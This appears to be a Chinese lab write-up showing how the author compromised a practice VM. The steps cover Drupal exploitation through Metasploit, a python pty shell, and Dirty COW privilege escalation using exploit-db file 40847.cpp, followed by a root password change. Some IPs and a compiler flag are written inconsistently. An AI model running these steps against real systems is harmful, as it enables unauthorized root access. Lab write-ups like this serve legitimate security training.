寻找靶机
主机ip:192.168.87.134
扫描端口
靶机位置为:192.168.87.140
扫描端口
得到三个端口22,80,1898
信息搜集
访问网站
162.168.87.140:80
一点没用
162.168.87.140:1898
有文字框可以考虑sql注入等等
同时点击图片发现url 中有个node可以利用
翻阅node发现m4a文件
访问(用win浏览器)
内容是user:tiago
和一张图片
没用
试试sql,使用sqlmap扫描
没有收获
用dirb扫一下
找到了更多网页
访问robot.txt
发现了更多文件,逐个查阅
发现drupal版本
用awvs扫一下
发现大量drupal的漏洞
使用msf
启动msf
msfconsole
搜索相关漏洞
search XXX(写系统名)
得到七个可用漏洞
使用第一个漏洞
use X(漏洞数字)
查看使用漏洞时需要的变量
show options
需要一个rhost和rpost ,设置一下
set XX(变量) XX(内容)
运行漏洞(多查几遍options以保证可以运行)
run
进入系统,可以运行基本指令如ls
查看权限
提权
我们下现在可以上传漏洞文件,所以寻找相关文件,上网搜搜得
linux低版本有一个很著名的漏洞叫做脏牛漏洞(Dirty Cow)。
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。
漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)
这个藏牛漏洞在msf没有现成的exp,所以需要去exploitdb上找。
原文链接:https://blog.csdn.net/m0_56375711/article/details/128434954
searchsploit dirty
并在文章中得知40847号文件对靶机比较亲和,记录相关文件路径
并上传到/tmp路径下
upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp
查看文件上传情况
打开shell(重要)
使用python调出交互模式
python -c "import pty; pty.spawn('/bin/bash')"
编译上传的文件
g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
代码解释
g++ 是 GNU 编译器的 C++ 前端,用于编译 C++ 代码;
-Wall 表示显示所有警告信息;
-pedantic 表示显示符合标准的警告信息;
-O2 表示进行较高级别的优化;
-std=c++11 表示使用 C++11 标准进行编译;
-pthread 表示链接 POSIX 线程库;
-o dcow 表示输出可执行文件名为 dcow;
40847.cpp 是要编译的源文件;
-lutil 表示链接 libutil 库。
运行
./dcow -s
成功提权,试试更改密码
成功,登录试试
成功